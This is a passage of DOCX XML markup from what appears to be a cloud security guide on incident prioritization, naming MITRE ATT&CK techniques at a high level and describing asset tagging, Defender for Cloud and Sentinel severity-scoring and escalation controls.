    <w:p w14:paraId="2DE03290" w14:textId="707EA8B7" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Business impact amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F953AA" w14:textId="48A9635D" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Lack of asset criticality awareness results in extended downtime for revenue-generating systems while focusing on non-critical infrastructure issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE6143" w14:textId="22AD8EF0" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Regulatory violation escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08912D3A" w14:textId="181F5051" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Incidents involving personally identifiable information (PII), protected health information (PHI), or financial data receive inadequate prioritization, leading to missed notification deadlines and compliance violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564D222" w14:textId="21C614BE" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Ineffective stakeholder communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1B787" w14:textId="32C7883B" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00A43D97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Absence of clear prioritization criteria prevents appropriate executive notification and resource allocation for incidents requiring senior leadership involvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6F73E" w14:textId="0F54DC84" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t xml:space="preserve">Attack progression during </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>misprioritization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F9FB173" w14:textId="510D8833" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:lastRenderedPageBreak/>
        <w:t>Sophisticated attackers exploit prioritization gaps to conduct lateral movement and data exfiltration while security teams focus on diversion tactics or lower-priority events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07658E63" w14:textId="406743BF" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FDA5E1" w14:textId="2BCB5AC9" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E136C39" w14:textId="63104645" w:rsidR="006B4EEF" w:rsidRDefault="006B4EEF" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006B4EEF">
        <w:t>masquerading (T1036) creating numerous low-priority alerts to overwhelm security teams while conducting high-impact activities in business-critical systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD99440" w14:textId="0462B38C" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0712657F" w14:textId="0E310B1A" w:rsidR="006B4EEF" w:rsidRDefault="006B4EEF" w:rsidP="00FB3909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006B4EEF">
        <w:t>data encrypted for impact (T1486) targeting high-value systems while security teams are distracted by lower-priority incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E00C9B" w14:textId="568841CE" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663293A2" w14:textId="5C9A5613" w:rsidR="006B4EEF" w:rsidRDefault="006B4EEF" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006B4EEF">
        <w:t>remote services (T1021) progressing through high-value networks while prioritization gaps prevent appropriate focus on critical asset compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04D90F" w14:textId="20389B3D" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00B86A9F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-5.1: Implement asset criticality and business impact assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBB754" w14:textId="77777777" w:rsidR="006B4EEF" w:rsidRDefault="006B4EEF" w:rsidP="00A43D97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Enable risk-based incident prioritization through business impact analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A70498" w14:textId="0BE63F8F" w:rsidR="006B4EEF" w:rsidRDefault="006B4EEF" w:rsidP="00A43D97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Implement comprehensive asset classification and business impact assessment using Azure Resource Tags, Microsoft Defender for Cloud asset inventory, and business impact scoring for risk-based incident prioritization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41FB3F" w14:textId="77777777" w:rsidR="00AE0BC7" w:rsidRPr="006B4EEF" w:rsidRDefault="00AE0BC7" w:rsidP="00AE0BC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8599E0" w14:textId="27AB1A7C" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00A43D97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Asset classification and tagging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D070C3E" w14:textId="561A7AD4" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Criticality-based resource tagging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBBED03" w14:textId="18E921B2" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Systematic tagging of Azure resources with criticality levels (Critical, High, Medium, Low) based on business impact assessment and revenue dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD136B3" w14:textId="7EC46A72" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Data Classification Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E2FB1" w14:textId="1214DF87" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Integration with Microsoft Purview data classification for automatic prioritization of incidents involving sensitive data categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA8F49" w14:textId="624D7DFF" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Business Function Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A010020" w14:textId="107C13AE" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Resource tagging with business function associations enabling rapid impact assessment for incidents affecting specific business capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249A826" w14:textId="22EE7B02" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Regulatory Scope Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CA0D76" w14:textId="7C521982" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Tagging resources subject to specific regulatory requirements (PCI-DSS, HIPAA, SOX) for appropriate incident escalation and notification procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2498A5DB" w14:textId="6B2E9463" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Owner and contact information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F641FA7" w14:textId="77777777" w:rsidR="00AE0BC7" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:lastRenderedPageBreak/>
        <w:t>Resource tagging with business owner contacts and technical support information for rapid stakeholder notification during incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA04554" w14:textId="1C3915FC" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Microsoft Defender for Cloud integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BFBF16" w14:textId="5B5056AD" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Asset inventory and risk assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381B49F" w14:textId="0F15C4D0" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Comprehensive asset inventory with security posture scoring and vulnerability assessment for risk-based prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150CA6A" w14:textId="5AD10945" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Business Impact Correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3793231D" w14:textId="292EA15C" w:rsidR="00E41A4A" w:rsidRDefault="00B86A9F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Correlation of security alerts with asset criticality tags for automatic incident severity adjustment and prioritization scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447EB4EA" w14:textId="1B485964" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Regulatory Compliance Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E276B" w14:textId="1692DD1B" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Integration with compliance assessments for automatic escalation of incidents affecting compliance-regulated resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A99994" w14:textId="5392B0A9" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Attack Surface Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ADE475" w14:textId="4B590292" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Attack surface visibility with prioritization of incidents involving internet-exposed or high-privilege resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE60BC" w14:textId="7712C01A" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Security Recommendation Prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B171149" w14:textId="6FA7E3C6" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Risk-based prioritization of security recommendations with business impact consideration and remediation timeline guidance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF4B00" w14:textId="1D646BDF" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="009815EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-5.2: Configure automated severity scoring and escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FFDE8C" w14:textId="77777777" w:rsidR="00AE0BC7" w:rsidRDefault="00AE0BC7" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Calculate risk-based incident priority through automated scoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0A98C3" w14:textId="560035DE" w:rsidR="00AE0BC7" w:rsidRPr="00AE0BC7" w:rsidRDefault="00AE0BC7" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Implement Microsoft Sentinel automated severity scoring with custom analytics rules and escalation workflows for appropriate prioritization and resource allocation based on multiple risk factors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64305C45" w14:textId="56DEC463" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Automated severity scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CAEE5" w14:textId="24422377" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Multi-factor risk scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B3B1ED" w14:textId="6289777C" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Comprehensive scoring algorithm considering asset criticality, data sensitivity, threat intelligence confidence, and potential business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44133700" w14:textId="1A017C35" w:rsidR="009815EB" w:rsidRPr="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Microsoft Sentinel Entity Risk Scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EACEC79" w14:textId="306552A7" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>AI-powered entity risk scoring for users, devices, and IP addresses with historical behavior analysis and anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFE999" w14:textId="37F057AD" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Threat Intelligence Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B097D1" w14:textId="21697ACE" w:rsidR="009815EB" w:rsidRDefault="009815EB" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009815EB">
        <w:t>Automatic severity adjustment based on threat intelligence feeds, known attacker infrastructure, and campaign attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517749AB" w14:textId="6AF25FD8" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Compliance Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E2B4C" w14:textId="666AB047" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Automatic severity escalation for incidents involving regulatory-protected data with appropriate notification workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5F7575" w14:textId="4287C2CC" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Time-based escalation rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBED03E" w14:textId="26C64943" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:lastRenderedPageBreak/>
        <w:t>Automated escalation procedures for unacknowledged incidents with severity-appropriate time thresholds and stakeholder notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01819AEF" w14:textId="77777777" w:rsidR="00AE0BC7" w:rsidRDefault="00AE0BC7" w:rsidP="00AE0BC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2086CCCA" w14:textId="387897C7" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Escalation and notification workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D6D17" w14:textId="5D5E14DD" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Executive notification triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2281C1" w14:textId="712392F9" w:rsidR="00616CDA" w:rsidRDefault="00616CDA" w:rsidP="007F2639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00616CDA">
        <w:t>Automated executive notification for critical incidents involving business-critical systems or potential regulatory violations</w:t>
      </w:r>
    </w:p>
